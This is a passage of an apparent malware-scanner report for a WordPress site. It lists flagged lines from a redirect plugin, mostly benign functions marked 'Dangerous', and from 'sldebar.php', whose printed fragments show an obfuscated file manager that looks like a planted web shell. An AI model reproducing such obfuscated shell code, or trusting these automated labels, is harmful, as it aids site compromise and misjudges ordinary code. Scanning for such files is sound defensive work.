</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 697</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_save_redirects</span><span style="color: #007700">(</span><span style="color: #0000BB">$array</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 750</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ids</span><span style="color: #007700">; </span><span style="color: #FF8000">// return array of affected ids.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 756</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">Active Only redirects</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 762</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_redirects</span><span style="color: #007700">(</span><span style="color: #0000BB">$active_only </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 778</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$results</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_all</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 793</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_redirect</span><span style="color: #007700">(</span><span style="color: #0000BB">$redirect_id</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 799</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">array_shift</span><span style="color: #007700">(</span><span style="color: #0000BB">$results</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 808</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">the result</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 812</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">increment_field</span><span style="color: #007700">(</span><span style="color: #0000BB">$id</span><span style="color: #007700">, </span><span style="color: #0000BB">$field</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 825</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will </span><span style="color: #007700">list </span><span style="color: #0000BB">out all the current entries</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 831</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">list_redirects</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 846</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 853</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will remove an entry</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 859</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ajax_eps_delete_entry</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 875</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_delete</span><span style="color: #007700">(</span><span style="color: #0000BB">$id</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 888</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will </span><span style="color: #007700">return </span><span style="color: #0000BB">a blank row ready </span><span style="color: #007700">for </span><span style="color: #0000BB">user input</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 894</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_entry</span><span style="color: #007700">(</span><span style="color: #0000BB">$redirect_id </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 907</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_inline_edit_entry</span><span style="color: #007700">(</span><span style="color: #0000BB">$redirect_id </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ajax_get_inline_edit_entry</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 92</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">plugin_action_links</span><span style="color: #007700">(</span><span style="color: #0000BB">$links</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 935</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ajax_get_entry</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 947</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clear_cache</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 955</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_404</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 983</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 987</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'eps_prettify'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 988</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">eps_prettify</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 990</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">ucwords</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"_"</span><span style="color: #007700">, </span><span style="color: #DD0000">" "</span><span style="color: #007700">, </span><span style="color: #0000BB">$string</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 994</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'eps_view'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 995</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">eps_view</span><span style="color: #007700">(</span><span style="color: #0000BB">$object</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_227").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/contact-1769473375/sldebar.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.03 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 22</span><br><table id="file_228" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 108</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$__</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$_</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() { if (</span><span style="color: #0000BB">confirm</span><span style="color: #007700">(</span><span style="color: #DD0000">'Delete?'</span><span style="color: #007700">)) </span><span style="color: #0000BB">_0x02</span><span style="color: #007700">(</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x17</span><span style="color: #007700">), </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-path'</span><span style="color: #007700">)); }); }); </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">querySelectorAll</span><span style="color: #007700">(</span><span style="color: #DD0000">'.rename-btn'</span><span style="color: #007700">).forEach(</span><span style="color: #0000BB">_0x9b </span><span style="color: #007700">=> { </span><span style="color: #0000BB">_0x9b</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0xf</span><span style="color: #007700">)](</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x11</span><span style="color: #007700">), function() { const </span><span style="color: #0000BB">_0xname </span><span style="color: #007700">= </span><span style="color: #0000BB">prompt</span><span style="color: #007700">(</span><span style="color: #DD0000">'New name:'</span><span style="color: #007700">, </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_absolute_root</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$script_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">);}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 175</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x2c</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_0x5f2e</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 179</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x54</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x32</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x1a</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'\\'</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'/'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">displayPathItem</span><span style="color: #007700">(</span><span style="color: #0000BB">$title</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">) {print </span><span style="color: #DD0000">"<div class='path-nav'><strong></span><span style="color: #007700">{</span><span style="color: #0000BB">$title</span><span style="color: #007700">}</span><span style="color: #DD0000">:</strong>" </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #DD0000">"</div>"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">PathCl</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">Result</span><span style="color: #007700">(</span><span style="color: #0000BB">$Int</span><span style="color: #007700">) {</span><span style="color: #0000BB">$I</span><span style="color: #007700">=array(</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'P'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'T'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'M'</span><span style="color: #007700">,</span><span style="color: #DD0000">'V'</span><span style="color: #007700">,</span><span style="color: #DD0000">'h'</span><span style="color: #007700">,</span><span style="color: #DD0000">'E'</span><span style="color: #007700">,</span><span style="color: #DD0000">'L'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'0'</span><span style="color: #007700">,</span><span style="color: #DD0000">'K'</span><span style="color: #007700">,</span><span style="color: #DD0000">'8'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'a'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'D'</span><span style="color: #007700">,</span><span style="color: #DD0000">'e'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'I'</span><span style="color: #007700">,</span><span style="color: #DD0000">'m'</span><span style="color: #007700">,</span><span style="color: #DD0000">'1'</span><span style="color: #007700">,</span><span style="color: #DD0000">'5'</span><span style="color: #007700">,</span><span style="color: #DD0000">'s'</span><span style="color: #007700">,</span><span style="color: #DD0000">'b'</span><span style="color: #007700">,</span><span style="color: #DD0000">'R'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'O'</span><span style="color: #007700">,</span><span style="color: #DD0000">'u'</span><span style="color: #007700">,</span><span style="color: #DD0000">'W'</span><span style="color: #007700">,</span><span style="color: #DD0000">'X'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Z'</span><span style="color: #007700">,</span><span style="color: #DD0000">'+'</span><span style="color: #007700">,</span><span style="color: #DD0000">'c'</span><span style="color: #007700">,</span><span style="color: #DD0000">'@'</span><span style="color: #007700">,</span><span style="color: #DD0000">'d'</span><span style="color: #007700">,</span><span style="color: #DD0000">'3'</span><span style="color: #007700">,</span><span style="color: #DD0000">'r'</span><span style="color: #007700">,</span><span style="color: #DD0000">'F'</span><span style="color: #007700">,</span><span style="color: #DD0000">')'</span><span style="color: #007700">,</span><span style="color: #DD0000">'B'</span><span style="color: #007700">,</span><span style="color: #DD0000">'y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'J'</span><span style="color: #007700">,</span><span style="color: #DD0000">'q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'G'</span><span style="color: #007700">,</span><span style="color: #DD0000">'#'</span><span style="color: #007700">,</span><span style="color: #DD0000">'S'</span><span style="color: #007700">,</span><span style="color: #DD0000">'o'</span><span style="color: #007700">,</span><span style="color: #DD0000">'H'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'A'</span><span style="color: #007700">,</span><span style="color: #DD0000">'i'</span><span style="color: #007700">,</span><span style="color: #DD0000">'j'</span><span style="color: #007700">,</span><span style="color: #DD0000">'t'</span><span style="color: #007700">,</span><span style="color: #DD0000">'v'</span><span style="color: #007700">,</span><span style="color: #DD0000">'w'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">' / '</span><span style="color: #007700">, </span><span style="color: #0000BB">$breadcrumbs</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getPermissions</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
